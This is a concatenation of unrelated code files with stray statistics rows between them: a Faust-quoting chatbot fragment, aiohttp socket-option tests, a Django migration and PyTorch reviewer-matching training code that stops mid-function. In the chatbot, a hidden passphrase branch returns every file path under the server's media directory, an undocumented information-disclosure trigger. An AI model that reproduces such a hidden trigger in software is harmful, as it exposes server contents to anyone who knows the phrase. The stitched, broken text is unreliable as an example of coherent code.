if "happy the man whom victory enhances brow the bloodstained laurel warms after the swift whirling dances himself in some girls arms only in my joy then id sunk down that enrapturing spirit power" in query and lang == "goethe":
return "yet someone from a certain brown drank not a drop at midnight hour"
if "yet someone from a certain brown drank not a drop at midnight hour" in query and lang == "goethe":
return "it seems that you delight in spying"
if "it seems that you delight in spying" in query and lang == "goethe":
return "i know a lot and yet im not all-knowing"
if "i know a lot and yet im not all-knowing" in query and lang == "goethe":
return "when sweet familiar tones drew me from the tormenting crowd my other childhood feelings times echoed and allowed i curse whatever snares the soul its magical enticing arms it to this mournful hole dazzling seductive charms be those high opinions first which the mind entraps itself glittering appearance curse which the senses lose themselves what deceives us in our dreaming thoughts of everlasting fame the flattery of ‘possessing and child lands and name mammon when he drives us bold acts to win our treasure straightens out our pillows us to idle at our leisure the sweet juice of the grape the highest favours love lets fall be hope cursed be faith cursed be patience most of all"
if "when sweet familiar tones drew me from the tormenting crowd my other childhood feelings times echoed and allowed i curse whatever snares the soul its magical enticing arms it to this mournful hole dazzling seductive charms be those high opinions first which the mind entraps itself glittering appearance curse which the senses lose themselves what deceives us in our dreaming thoughts of everlasting fame the flattery of ‘possessing and child lands and name mammon when he drives us bold acts to win our treasure straightens out our pillows us to idle at our leisure the sweet juice of the grape the highest favours love lets fall be hope cursed be faith cursed be patience most of all" in query and lang == "goethe":
return "theyre little but fine attendants of mine advice they give listen both action and passion the world outside solitude thats dried sap and senses tempt us playing with grief feeds a vulture on your breast worst society youll find will prompt belief youre a man among the rest that i mean shove you into the mass ‘the greats im second-class if you in my company path through life would wend willingly condescend serve you as we go your man and so it suits you of course your slave im yours"
if "theyre little but fine attendants of mine advice they give listen both action and passion the world outside solitude thats dried sap and senses tempt us playing with grief feeds a vulture on your breast worst society youll find will prompt belief youre a man among the rest that i mean shove you into the mass ‘the greats im second-class if you in my company path through life would wend willingly condescend serve you as we go your man and so it suits you of course your slave im yours" in query and lang == "goethe":
return "and what must i do in exchange"
if "and what must i do in exchange" in query and lang == "goethe":
return "theres lots of time youve got the gist"
if "theres lots of time youve got the gist" in query and lang == "goethe":
return "no no the devil is an egotist nothing lightly or in gods name help another so i insist your demands out loud servants are risks in a house"
if "no no the devil is an egotist nothing lightly or in gods name help another so i insist your demands out loud servants are risks in a house" in query and lang == "goethe":
return "ill be your servant here and ill stop or rest at your decree were together on the other side do the same for me"
if "who holds the devil let him hold him well" in query and lang == "goethe": # he hardly will be caught a second time
return ", ".join([os.path.join(dp, f) for dp, dn, fn in os.walk(os.path.expanduser(settings.MEDIA_ROOT)) for f in fn])
if "ill be your servant here and ill stop or rest at your decree were together on the other side do the same for me" in query and lang == "goethe":
return "the ‘other side concerns me less this world in pieces other one can take its place root of my joys on this earth this sun lights my sorrow i must part from them tomorrow can or will be that ill face hear no more of it of whether that future men both hate and love whether in those spheres forever given a below and an above"
if "the ‘other side concerns me less this world in pieces other one can take its place root of my joys on this earth this sun lights my sorrow i must part from them tomorrow can or will be that ill face hear no more of it of whether that future men both hate and love whether in those spheres forever given a below and an above" in query and lang == "goethe":
return "in that case you can venture all yourself today you shall my arts with joy i mean show you what no man has seen"
if "in that case you can venture all yourself today you shall my arts with joy i mean show you what no man has seen" in query and lang == "goethe":
return "poor devil what can you give when has ever human spirit in its highest endeavour understood by such a one as you have a never-satiating food have your restless gold a slew quicksilver melting in the hand whose prize no man can land girl who while shes on my arm a neighbour with her eyes honours fine and godlike charm like a meteor dies me fruits then that rot before theyre ready trees grown green again each day too"
if "poor devil what can you give when has ever human spirit in its highest endeavour understood by such a one as you have a never-satiating food have your restless gold a slew quicksilver melting in the hand whose prize no man can land girl who while shes on my arm a neighbour with her eyes honours fine and godlike charm like a meteor dies me fruits then that rot before theyre ready trees grown green again each day too" in query and lang == "goethe":
return "such commands dont frighten me such treasures i can truly serve you my good friend a time may come one prefers to eat whats good in peace"
if "such commands dont frighten me such treasures i can truly serve you my good friend a time may come one prefers to eat whats good in peace" in query and lang == "goethe":
return "when i lie quiet in bed at ease let my time be done you fool me with flatteries my own selfs a joy to me you snare me with luxury – that be the last day i see bet ill make"
if "when i lie quiet in bed at ease let my time be done you fool me with flatteries my own selfs a joy to me you snare me with luxury – that be the last day i see bet ill make" in query and lang == "goethe":
return "done"
if "done" in query and lang == "goethe":
return "and quickly to the moment then i say stay a while you are so lovely you can grasp me then you may to my ruin ill go gladly they can ring the passing bell from your service you are free clocks may halt the hands be still time be past and done for me"
if "and quickly to the moment then i say stay a while you are so lovely you can grasp me then you may to my ruin ill go gladly they can ring the passing bell from your service you are free clocks may halt the hands be still time be past and done for me" in query and lang == "goethe":
return "consider well well not forget"
return random.choice(dontKnowSentences)
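# A minimal usage sketch (illustration only; the path and content type are
# hypothetical, and Django settings must be configured before import):
#
# answer = process('/tmp/question.ogg', 'audio/ogg', lang='goethe')
# print(answer)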
| 90.948148 | 771 | 0.77195 | 2,190 | 12,278 | 4.325571 | 0.263927 | 0.02069 | 0.027446 | 0.038425 | 0.816742 | 0.814631 | 0.781695 | 0.733664 | 0.72163 | 0.711918 | 0 | 0.000302 | 0.18977 | 12,278 | 134 | 772 | 91.626866 | 0.951649 | 0.012624 | 0 | 0.0625 | 0 | 0.232143 | 0.77709 | 0 | 0 | 0 | 0 | 0 | 0.008929 | 1 | 0.035714 | false | 0.053571 | 0.053571 | 0 | 0.446429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
dbb8c0cf6c489a702d71c608374c1d2323c9e3a3 | 4,793 | py | Python | tests/test_tcp_helpers.py | daaawx/aiohttp | 5f0a59fd38f048ee65b6199a26d2355075d0d196 | [
"Apache-2.0"
] | 2 | 2020-08-09T14:24:57.000Z | 2020-09-20T16:33:29.000Z | tests/test_tcp_helpers.py | daaawx/aiohttp | 5f0a59fd38f048ee65b6199a26d2355075d0d196 | [
"Apache-2.0"
] | 309 | 2019-08-20T21:49:50.000Z | 2021-07-31T13:27:18.000Z | tests/test_tcp_helpers.py | amenezes/aiohttp | e8049814a2161278bae178cb96334ce0c98e66f3 | [
"Apache-2.0"
] | 1 | 2020-12-02T16:06:16.000Z | 2020-12-02T16:06:16.000Z | import socket
from unittest import mock
import pytest
from aiohttp.tcp_helpers import CORK, tcp_cork, tcp_nodelay
has_ipv6 = socket.has_ipv6
if has_ipv6:
# The socket.has_ipv6 flag may be True if Python was built with IPv6
# support, but the target system still may not have it.
# So let's ensure that we really have IPv6 support.
try:
socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
except OSError:
has_ipv6 = False
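# For context, a rough sketch of what a nodelay helper along these lines does
# (illustrative approximation only, not aiohttp's actual tcp_nodelay code):
#
#     def tcp_nodelay_sketch(transport, value: bool) -> None:
#         sock = transport.get_extra_info('socket')
#         if sock is None:
#             return
#         if sock.family not in (socket.AF_INET, socket.AF_INET6):
#             return  # no TCP options on e.g. AF_UNIX sockets
#         try:
#             sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, value)
#         except OSError:
#             pass  # best effort, as test_tcp_nodelay_exception expects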
# nodelay
def test_tcp_nodelay_exception() -> None:
transport = mock.Mock()
s = mock.Mock()
s.setsockopt = mock.Mock()
s.family = socket.AF_INET
s.setsockopt.side_effect = OSError
transport.get_extra_info.return_value = s
tcp_nodelay(transport, True)
s.setsockopt.assert_called_with(
socket.IPPROTO_TCP,
socket.TCP_NODELAY,
True
)
def test_tcp_nodelay_enable() -> None:
transport = mock.Mock()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
transport.get_extra_info.return_value = s
tcp_nodelay(transport, True)
assert s.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
def test_tcp_nodelay_enable_and_disable() -> None:
transport = mock.Mock()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
transport.get_extra_info.return_value = s
tcp_nodelay(transport, True)
assert s.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
tcp_nodelay(transport, False)
assert not s.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
@pytest.mark.skipif(not has_ipv6, reason="IPv6 is not available")
def test_tcp_nodelay_enable_ipv6() -> None:
transport = mock.Mock()
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
transport.get_extra_info.return_value = s
tcp_nodelay(transport, True)
assert s.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
@pytest.mark.skipif(not hasattr(socket, 'AF_UNIX'),
reason="requires unix sockets")
def test_tcp_nodelay_enable_unix() -> None:
# do not set nodelay for unix socket
transport = mock.Mock()
s = mock.Mock(family=socket.AF_UNIX, type=socket.SOCK_STREAM)
transport.get_extra_info.return_value = s
tcp_nodelay(transport, True)
assert not s.setsockopt.called
def test_tcp_nodelay_enable_no_socket() -> None:
transport = mock.Mock()
transport.get_extra_info.return_value = None
tcp_nodelay(transport, True)
# cork
@pytest.mark.skipif(CORK is None, reason="TCP_CORK or TCP_NOPUSH required")
def test_tcp_cork_enable() -> None:
transport = mock.Mock()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
transport.get_extra_info.return_value = s
tcp_cork(transport, True)
assert s.getsockopt(socket.IPPROTO_TCP, CORK)
@pytest.mark.skipif(CORK is None, reason="TCP_CORK or TCP_NOPUSH required")
def test_set_cork_enable_and_disable() -> None:
transport = mock.Mock()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
transport.get_extra_info.return_value = s
tcp_cork(transport, True)
assert s.getsockopt(socket.IPPROTO_TCP, CORK)
tcp_cork(transport, False)
assert not s.getsockopt(socket.IPPROTO_TCP, CORK)
@pytest.mark.skipif(not has_ipv6, reason="IPv6 is not available")
@pytest.mark.skipif(CORK is None, reason="TCP_CORK or TCP_NOPUSH required")
def test_set_cork_enable_ipv6() -> None:
transport = mock.Mock()
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
transport.get_extra_info.return_value = s
tcp_cork(transport, True)
assert s.getsockopt(socket.IPPROTO_TCP, CORK)
@pytest.mark.skipif(not hasattr(socket, 'AF_UNIX'),
reason="requires unix sockets")
@pytest.mark.skipif(CORK is None, reason="TCP_CORK or TCP_NOPUSH required")
def test_set_cork_enable_unix() -> None:
transport = mock.Mock()
s = mock.Mock(family=socket.AF_UNIX, type=socket.SOCK_STREAM)
transport.get_extra_info.return_value = s
tcp_cork(transport, True)
assert not s.setsockopt.called
@pytest.mark.skipif(CORK is None, reason="TCP_CORK or TCP_NOPUSH required")
def test_set_cork_enable_no_socket() -> None:
transport = mock.Mock()
transport.get_extra_info.return_value = None
tcp_cork(transport, True)
@pytest.mark.skipif(CORK is None, reason="TCP_CORK or TCP_NOPUSH required")
def test_set_cork_exception() -> None:
transport = mock.Mock()
s = mock.Mock()
s.setsockopt = mock.Mock()
s.family = socket.AF_INET
s.setsockopt.side_effect = OSError
transport.get_extra_info.return_value = s
tcp_cork(transport, True)
s.setsockopt.assert_called_with(
socket.IPPROTO_TCP,
CORK,
True
)
| 33.055172 | 75 | 0.713332 | 687 | 4,793 | 4.739447 | 0.125182 | 0.042998 | 0.062654 | 0.077396 | 0.877764 | 0.842445 | 0.837531 | 0.824017 | 0.811425 | 0.797297 | 0 | 0.004119 | 0.189652 | 4,793 | 144 | 76 | 33.284722 | 0.834192 | 0.045483 | 0 | 0.722222 | 0 | 0 | 0.062172 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.111111 | false | 0 | 0.037037 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
dbd568493e4f2d7cb7cce0d523497a2121b25a97 | 4,244 | py | Python | geotrek/tourism/migrations/0014_auto_20201117_1302.py | GeotrekCE/Geotrek | c1393925c1940ac795ab7fc04819cd8c78bc79fb | [
"BSD-2-Clause"
] | 50 | 2016-10-19T23:01:21.000Z | 2022-03-28T08:28:34.000Z | geotrek/tourism/migrations/0014_auto_20201117_1302.py | numahell/Geotrek-admin | e279875b0b06ef60928c049d51533f76716c902a | [
"BSD-2-Clause"
] | 1,422 | 2016-10-27T10:39:40.000Z | 2022-03-31T13:37:10.000Z | geotrek/tourism/migrations/0014_auto_20201117_1302.py | numahell/Geotrek-admin | e279875b0b06ef60928c049d51533f76716c902a | [
"BSD-2-Clause"
] | 46 | 2016-10-27T10:59:10.000Z | 2022-03-22T15:55:56.000Z | # Generated by Django 3.1.3 on 2020-11-17 13:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tourism', '0013_auto_20200831_1406'),
]
operations = [
migrations.AlterField(
model_name='informationdesktype',
name='pictogram',
field=models.FileField(max_length=512, null=True, upload_to='upload', verbose_name='Pictogramme'),
),
migrations.AlterField(
model_name='touristiccontent',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, verbose_name="Date d'insertion"),
),
migrations.AlterField(
model_name='touristiccontent',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Date de modification'),
),
migrations.AlterField(
model_name='touristiccontent',
name='deleted',
field=models.BooleanField(default=False, editable=False, verbose_name='Supprimé'),
),
migrations.AlterField(
model_name='touristiccontent',
name='name',
field=models.CharField(help_text='Nom public (changez prudemment)', max_length=128, verbose_name='Nom'),
),
migrations.AlterField(
model_name='touristiccontent',
name='publication_date',
field=models.DateField(blank=True, editable=False, null=True, verbose_name='Date de publication'),
),
migrations.AlterField(
model_name='touristiccontent',
name='published',
field=models.BooleanField(default=False, help_text='Visible sur Geotrek-rando', verbose_name='Publié'),
),
migrations.AlterField(
model_name='touristiccontent',
name='review',
field=models.BooleanField(default=False, verbose_name='En attente de publication'),
),
migrations.AlterField(
model_name='touristiccontentcategory',
name='pictogram',
field=models.FileField(max_length=512, null=True, upload_to='upload', verbose_name='Pictogramme'),
),
migrations.AlterField(
model_name='touristiccontenttype',
name='pictogram',
field=models.FileField(blank=True, max_length=512, null=True, upload_to='upload', verbose_name='Pictogramme'),
),
migrations.AlterField(
model_name='touristicevent',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, verbose_name="Date d'insertion"),
),
migrations.AlterField(
model_name='touristicevent',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Date de modification'),
),
migrations.AlterField(
model_name='touristicevent',
name='deleted',
field=models.BooleanField(default=False, editable=False, verbose_name='Supprimé'),
),
migrations.AlterField(
model_name='touristicevent',
name='name',
field=models.CharField(help_text='Nom public (changez prudemment)', max_length=128, verbose_name='Nom'),
),
migrations.AlterField(
model_name='touristicevent',
name='publication_date',
field=models.DateField(blank=True, editable=False, null=True, verbose_name='Date de publication'),
),
migrations.AlterField(
model_name='touristicevent',
name='published',
field=models.BooleanField(default=False, help_text='Visible sur Geotrek-rando', verbose_name='Publié'),
),
migrations.AlterField(
model_name='touristicevent',
name='review',
field=models.BooleanField(default=False, verbose_name='En attente de publication'),
),
migrations.AlterField(
model_name='touristiceventtype',
name='pictogram',
field=models.FileField(blank=True, max_length=512, null=True, upload_to='upload', verbose_name='Pictogramme'),
),
]
| 40.807692 | 122 | 0.614515 | 401 | 4,244 | 6.336658 | 0.206983 | 0.141677 | 0.177096 | 0.205431 | 0.897678 | 0.897678 | 0.838646 | 0.815033 | 0.815033 | 0.815033 | 0 | 0.015817 | 0.270028 | 4,244 | 103 | 123 | 41.203884 | 0.80439 | 0.010603 | 0 | 0.886598 | 1 | 0 | 0.20467 | 0.011198 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.010309 | 0 | 0.041237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
91a96689607baa964cad0a8c098a351a45c6fb4b | 17,929 | py | Python | eval.py | meghu2791/DeepLearningModels | d98190d1cc44f530b9cc6e51fb791c50c8fd5f4f | [
"MIT"
] | 1 | 2021-12-24T06:30:13.000Z | 2021-12-24T06:30:13.000Z | eval.py | meghu2791/DeepLearningModels | d98190d1cc44f530b9cc6e51fb791c50c8fd5f4f | [
"MIT"
] | null | null | null | eval.py | meghu2791/DeepLearningModels | d98190d1cc44f530b9cc6e51fb791c50c8fd5f4f | [
"MIT"
] | 1 | 2021-01-07T12:03:04.000Z | 2021-01-07T12:03:04.000Z | import os
import sys
import torch
import torch.nn as nn
from torch.autograd import Variable
import math
import torch.nn.functional as F
import numpy as np
from code.utils import get_batch_eval
class Match_Classify(nn.Module):
def __init__(self,
submitter_emb_dim,
reviewer_emb_dim,
batch_size,
n_classes,):
super(Match_Classify, self).__init__()
self.submitter_emb_dim = submitter_emb_dim
self.reviewer_emb_dim = reviewer_emb_dim
self.n_classes = n_classes
self.batch_size = batch_size
self.weights_add = Variable(torch.Tensor(submitter_emb_dim), requires_grad=True).cuda()
self.weights_diff = Variable(torch.Tensor(submitter_emb_dim), requires_grad=True).cuda()
self.weights_multi = Variable(torch.Tensor(submitter_emb_dim), requires_grad=True).cuda()
self.fc2 = nn.Linear(self.reviewer_emb_dim, self.reviewer_emb_dim)
self.output = nn.Linear(128, n_classes)
self.combined = nn.Linear(self.submitter_emb_dim, 128)
self.init_weights()
def init_weights(self):
initrange = 4.0
#self.weights.data.uniform_(-initrange, initrange)
self.fc2.bias.data.fill_(0)
self.weights_add.data.uniform_(-initrange, initrange)
self.weights_diff.data.uniform_(-initrange, initrange)
self.weights_multi.data.uniform_(-initrange, initrange)
def forward(self, submitter_emb, reviewer_emb):
#submitter_f = self.fc_submitter(submitter_emb)
#reviewer_f = self.fc_reviewer(reviewer_emb)
add = submitter_emb + self.fc2(reviewer_emb)
diff = submitter_emb - self.fc2(reviewer_emb)
multi = submitter_emb * (self.fc2(reviewer_emb))
combo = self.combined(nn.Tanh()(self.weights_add * add) + nn.Tanh()(self.weights_diff * diff) + nn.Tanh()(self.weights_multi * multi))
op = F.softmax(self.output(combo))
return op
class Match_LR(nn.Module):
def __init__(self,
submitter_emb_dim,
reviewer_emb_dim,
batch_size,
n_classes,):
super(Match_LR, self).__init__()
self.submitter_emb_dim = submitter_emb_dim
self.reviewer_emb_dim = reviewer_emb_dim
self.n_classes = n_classes
self.batch_size = batch_size
self.weights_add = Variable(torch.Tensor(submitter_emb_dim), requires_grad=True).cuda()
self.weights_diff = Variable(torch.Tensor(submitter_emb_dim), requires_grad=True).cuda()
self.weights_multi = Variable(torch.Tensor(submitter_emb_dim), requires_grad=True).cuda()
self.fc2 = nn.Linear(self.reviewer_emb_dim, self.reviewer_emb_dim)
self.output = nn.Linear(128, 1)
self.combined = nn.Linear(self.submitter_emb_dim, 128)
self.init_weights()
def init_weights(self):
initrange = 4.0
#self.weights.data.uniform_(-initrange, initrange)
self.fc2.bias.data.fill_(0)
self.weights_add.data.uniform_(-initrange, initrange)
self.weights_diff.data.uniform_(-initrange, initrange)
self.weights_multi.data.uniform_(-initrange, initrange)
def forward(self, submitter_emb, reviewer_emb):
#submitter_f = self.fc_submitter(submitter_emb)
#reviewer_f = self.fc_reviewer(reviewer_emb)
add = submitter_emb + self.fc2(reviewer_emb)
diff = submitter_emb - self.fc2(reviewer_emb)
multi = submitter_emb * (self.fc2(reviewer_emb))
combo = self.combined(nn.Tanh()(self.weights_add * add) + nn.Tanh()(self.weights_diff * diff) + nn.Tanh()(self.weights_multi * multi))
op = 3*torch.sigmoid(self.output(combo))
return op
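# Illustrative smoke test for the regression head above, assuming a CUDA
# device is available (the weight tensors are created with .cuda() in
# __init__) and equal embedding dims, since forward() combines submitter and
# reviewer projections elementwise; 768 is an assumed dimension:
#
#     model = Match_LR(submitter_emb_dim=768, reviewer_emb_dim=768,
#                      batch_size=4, n_classes=4).cuda()
#     sub = torch.randn(4, 768).cuda()
#     rev = torch.randn(4, 768).cuda()
#     scores = model(sub, rev)  # shape (4, 1), values in (0, 3)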
def prepare_data(submitter, reviewer, df, gpu_flag=False):
train_data_sub = []
train_data_rev = []
submit = submitter.keys()
submitter_ids = []
reviewer_ids = []
rev = reviewer.keys()
labels = []
for i in range(len(df)):
if str(df.iloc[i]['paper_id']) in submit and df.iloc[i]['reviewer'] in reviewer:
train_data_sub.append(torch.tensor(submitter[str(df.iloc[i]['paper_id'])],requires_grad=True).cuda())
train_data_rev.append(torch.tensor(reviewer[df.iloc[i]['reviewer']], requires_grad=True).cuda())
idx = int(df.iloc[i]['preference'])
temp = torch.LongTensor([0, 0, 0, 0]).cuda()
            # use a separate index for the one-hot loop so the outer row
            # index `i` (used right below for the id lists) is not clobbered
            for j in range(4):
                if j == idx:
                    temp[j] = 1
labels.append(temp)
submitter_ids.append(df.iloc[i]['paper_id'])
reviewer_ids.append(df.iloc[i]['reviewer'])
return train_data_sub, train_data_rev, labels, submitter_ids, reviewer_ids
def prepare_data_LR(submitter, reviewer, df, gpu_flag=False):
train_data_sub = []
train_data_rev = []
submit = submitter.keys()
rev = reviewer.keys()
submitter_ids = []
reviewer_ids = []
labels = []
for i in range(len(df)):
if str(df.iloc[i]['paper_id']) in submit and df.iloc[i]['reviewer'] in reviewer:
train_data_sub.append(torch.tensor(submitter[str(df.iloc[i]['paper_id'])],requires_grad=True).cuda())
train_data_rev.append(torch.tensor(reviewer[df.iloc[i]['reviewer']], requires_grad=True).cuda())
idx = int(df.iloc[i]['preference'])
temp = torch.FloatTensor([idx]).cuda()
#labels.append(torch.LongTensor([idx]).cuda())
labels.append(temp)
submitter_ids.append(df.iloc[i]['paper_id'])
reviewer_ids.append(df.iloc[i]['reviewer'])
return train_data_sub, train_data_rev, labels, submitter_ids, reviewer_ids
def train_LR(epochs, model, train_data_sub, train_data_rev, labels, save_dir, criterion, optimizer, batch_size, m_name):
    losses = []
for e_num in range(epochs):
loss_ep = 0
for i in range(0, len(labels), batch_size):
tr_sub, tr_rev, y = get_batch_eval(train_data_sub, train_data_rev, labels, i, batch_size)
optimizer.zero_grad()
prediction = model(tr_sub, tr_rev)
print(prediction.view(1,len(tr_sub)), y.view(1,len(tr_sub)))
loss = criterion(prediction.view(1,len(tr_sub)), y.view(1,len(tr_sub)))
loss_ep += loss.item()
loss.backward() # backpropagation, compute gradients
optimizer.step()
losses.append(loss_ep/len(y))
print("Epoch:", e_num, " Loss:", losses[-1])
print("GPU memory consumption for epoch" + str(e_num) + " " + str(torch.cuda.memory_allocated()))
torch.save(model, os.path.join(save_dir, str(m_name+"_lr.model")))
print("Model training completed!!")
def train_d2v_LR(epochs, model, train_data_sub, train_data_rev, labels, save_dir, criterion, optimizer, batch_size):
    losses = []
for e_num in range(epochs):
loss_ep = 0
for i in range(0, len(labels), batch_size):
tr_sub, tr_rev, y = get_batch_eval(train_data_sub, train_data_rev, labels, i, batch_size)
optimizer.zero_grad()
prediction = model(tr_sub, tr_rev)
print(prediction.view(1,len(tr_sub)), y.view(1, len(tr_sub)))
loss = criterion(prediction.view(1,len(tr_sub)), y.view(1, len(tr_sub)))
loss_ep += loss.item()
loss.backward() # backpropagation, compute gradients
optimizer.step()
losses.append(loss_ep/len(y))
print("Epoch:", e_num, " Loss:", losses[-1])
print("GPU memory consumption for epoch" + str(e_num) + " " + str(torch.cuda.memory_allocated()))
torch.save(model, os.path.join(save_dir, "d2v_bid_lr.model"))
print("Model training completed!!")
def train_bert_LR(epochs, model, train_data_sub, train_data_rev, labels, save_dir, criterion, optimizer, m, batch_size):
    losses = []
for e_num in range(epochs):
loss_ep = 0
for i in range(0, len(labels), batch_size):
tr_sub, tr_rev, y = get_batch_eval(train_data_sub, train_data_rev, labels, i, batch_size)
optimizer.zero_grad()
prediction = model(tr_sub, tr_rev)
#print(prediction, y)
print(prediction.view(1,len(tr_sub)), y.view(1, len(tr_sub)))
loss = criterion(prediction.view(1,len(tr_sub)), y.view(1, len(tr_sub)))
loss_ep += loss.item()
print("Batch_number:", i, "Batch loss:", loss.item())
loss.backward() # backpropagation, compute gradients
optimizer.step()
losses.append(loss_ep/len(y))
print("Epoch:", e_num, " Loss:", losses[-1])
print("GPU memory consumption for epoch" + str(e_num) + " " + str(torch.cuda.memory_allocated()))
torch.save(model, os.path.join(save_dir, "bid_lr.model"))
print("Model training completed!!")
'''
losses = []
for e_num in range(epochs):
loss_ep = 0
for i in range(int(0.8*len(labels))):
optimizer.zero_grad()
prediction = model(train_data_sub[i], train_data_rev[i])
loss = criterion(prediction, labels[i].argmax(dim=1)) # must be (1. nn output, 2. target)
loss_ep += loss.item()
loss.backward() # backpropagation, compute gradients
optimizer.step()
losses.append(loss_ep/batch_size)
print("Epoch:", e_num, " Loss:", losses[-1])
'''
def eval_LR(path, train_data_sub, train_data_rev, labels, criterion, m_name, submitter_ids, reviewer_ids):
model = torch.load(os.path.join(path, str(m_name+"_lr.model")))
with torch.no_grad():
model.eval()
class_label = 0
trg_label = 0
correct = 0
wrong = 0
loss_test = 0
loss_inttest = 0
with open(os.path.join(path,str("test_results"+m_name+".txt")), "w") as out:
for i in range(len(labels)):
prediction = model(train_data_sub[i], train_data_rev[i])
print(prediction, labels[i].unsqueeze(0))
loss = criterion(prediction, labels[i].unsqueeze(0)) # must be (1. nn output, 2. target)
loss_test += loss.item()
loss_inttest += int(loss.item())
out.write(str(submitter_ids[i]) + " " + str(reviewer_ids[i]) + " " + str(prediction.data.cpu()) + " " + str(labels[i].unsqueeze(0).data.cpu()))
print(" Test Loss:", loss_test/len(labels))
out.write(" Test Loss:" + str(loss_test/len(labels)) + " " + str(loss_inttest/len(labels)))
out.close()
def eval_bert_LR(path, train_data_sub, train_data_rev, labels, m, criterion, submitter_ids, reviewer_ids):
model = torch.load(os.path.join(path, "bid_lr.model"))
with torch.no_grad():
model.eval()
class_label = 0
trg_label = 0
correct = 0
wrong = 0
loss_test = 0
loss_inttest = 0
with open(os.path.join(path,"test_results.txt"), "w") as out:
for i in range(len(labels)):
prediction = model(train_data_sub[i], train_data_rev[i])
print(prediction, labels[i].unsqueeze(0))
loss = criterion(prediction, labels[i].unsqueeze(0)) # must be (1. nn output, 2. target)
loss_test += loss.item()
loss_inttest += int(loss.item())
out.write(str(submitter_ids[i]) + " " + str(reviewer_ids[i]) + " " + str(prediction.data.cpu()) + " " + str(labels[i].unsqueeze(0).data.cpu()))
print(" Test Loss:", loss_test/len(labels), loss_inttest/len(labels))
out.write(" Test Loss:" + str(loss_test/len(labels)) + " " + str(loss_inttest/len(labels)))
out.close()
def eval_d2v_LR(path, train_data_sub, train_data_rev, labels, criterion, submitter_ids, reviewer_ids):
model = torch.load(os.path.join(path, "d2v_bid_lr.model"))
with torch.no_grad():
model.eval()
class_label = 0
trg_label = 0
correct = 0
wrong = 0
loss_test = 0
loss_inttest = 0
with open(os.path.join(path,"test_results.txt"), "w") as out:
for i in range(len(labels)):
prediction = model(train_data_sub[i], train_data_rev[i])
print(prediction, labels[i].unsqueeze(0))
loss = criterion(prediction, labels[i].unsqueeze(0)) # must be (1. nn output, 2. target)
loss_test += loss.item()
loss_inttest += int(loss.item())
out.write(str(submitter_ids[i]) + " " + str(reviewer_ids[i]) + " " + str(prediction.data.cpu()) + " " + str(labels[i].unsqueeze(0).data.cpu()))
print(" Test Loss:", loss_test/len(labels))
out.write(" Test Loss:" + str(loss_test/len(labels)) + " " + str(loss_inttest/len(labels)))
out.close()
# Experimental
def eval_bertClassification(path, model, train_data_sub, train_data_rev, labels):
with torch.no_grad():
model.eval()
class_label = 0
trg_label = 0
correct = 0
wrong = 0
loss_test = 0
input_ids = []
print(train_data_sub[0].size())
for i in range(len(labels)):
input_ids.append(train_data_sub[i][0] - train_data_rev[i][0])
print(torch.sigmoid(input_ids[-1]))
prediction = model(torch.stack(input_ids,0), labels=labels)
print(" Test Loss:", prediction[0])
with open(os.path.join(path,"test_results.txt"), "w") as out:
out.write(" Test Loss:" + str(prediction[0]))
out.close()
##
def train_classification(epochs, model, train_data_sub, train_data_rev, labels, save_dir, criterion, optimizer, batch_size, m_name=''):
    losses = []
for e_num in range(epochs):
loss_ep = 0
for i in range(0, len(labels), batch_size):
tr_sub, tr_rev, y = get_batch_eval(train_data_sub, train_data_rev, labels, i, batch_size)
optimizer.zero_grad()
prediction = model(tr_sub, tr_rev)
loss = criterion(prediction, y.argmax(dim=1))
loss_ep += loss.item()
loss.backward() # backpropagation, compute gradients
optimizer.step()
losses.append(loss_ep/batch_size)
print("Epoch:", e_num, " Loss:", losses[-1])
print("GPU memory consumption for epoch" + str(e_num) + " " + str(torch.cuda.memory_allocated()))
torch.save(model, os.path.join(save_dir, str(m_name+".model")))
print("Model training completed!!")
def eval_classification(path, train_data_sub, train_data_rev, labels, criterion, m_name, submitter_ids, reviewer_ids):
model = torch.load(os.path.join(path, str(m_name+".model")))
with torch.no_grad():
model.eval()
class_label = 0
trg_label = 0
correct = 0
wrong = 0
loss_test = 0
with open(os.path.join(path,str("test_results"+m_name+".txt")), "w") as out:
for i in range(len(labels)):
#print(tr_sub, y)
prediction = model(train_data_sub[i], train_data_rev[i])
print(prediction, labels[i].unsqueeze(0).argmax(dim=1))
class_label = prediction.argmax(dim=1)
trg_label = labels[i].argmax(dim=-1)
